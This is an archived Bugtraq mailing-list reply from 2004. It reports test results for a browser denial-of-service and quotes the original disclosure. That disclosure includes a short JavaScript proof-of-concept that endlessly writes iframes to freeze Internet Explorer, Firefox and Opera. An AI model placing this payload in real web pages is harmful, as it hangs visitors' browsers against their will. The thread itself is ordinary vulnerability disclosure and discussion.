Network Security: Detailed info on Re: IE, Firefox, Opera DoS

Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.

Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.

Network Security Bugtraq

[Top] [All Lists]

Re: IE, Firefox, Opera DoS

from [Dan Pixley] Network Security

[Permanent Link]

Subject:	Re: IE, Firefox, Opera DoS
Date:	Mon, 23 Aug 2004 13:09:38 +0000

Tested this in Mozilla 1.7.2 and Epiphany 1.2.6 in Linux (kernel 2.6.8,
Gentoo, Gnome 2.6.2).

Each browser comes up with a warning about running the script.  The user
can chose to run it or not.  Either way, a dialog box reloads over and
over until the main window is forced closed with xkill.

Dan Pixley

On Sat, 2004-08-21 at 20:41, exploits@su1d.net wrote:

Description
========
 
    Browser DoS through viewing of a malicious page that repeatedly loads 
iframes of C:\Windows\System32 using 100% cpu
    Tested on Mozilla Firefox 0.9.3, Opera 7.54 and IE 6.0 - Opera gives the 
error "The address type is unknown or unsupported" over and over
 
POC
===
URL : http://www.su1d.net/iframe2.html

<scr1pt language="JavaScript">
while(true) 
{
   document.write("<iframe src=\"C:\Windows\system32\"></iframe>");
}
</scr1pt>
Discovered by MeFakon from the su1d exploit development team

[More with this subject...]

<Prev in Thread]	Current Thread	[Next in Thread>
IE, Firefox, Opera DoS, exploits Re: IE, Firefox, Opera DoS, Dan Pixley <= RE: IE, Firefox, Opera DoS, GulfTech Security *RE: IE, Firefox, Opera DoS (not* a DoS, not even close)*, Steve R*

Previous by Date:	Re: MDKSA-2004:084 - Updated spamassassin packages fixes possible malformed message vulnerability (OpenBSD 3.5 too??), Joel D. Kinard
Next by Date:	RE: Third party cookie handling in Opera can lead to potential compromises in Servers relying on redirection, Rohit Dube
Previous by Thread:	IE, Firefox, Opera DoS, exploits
Next by Thread:	RE: IE, Firefox, Opera DoS, GulfTech Security
Indexes:	[Date] [Thread] [Top] [All Lists]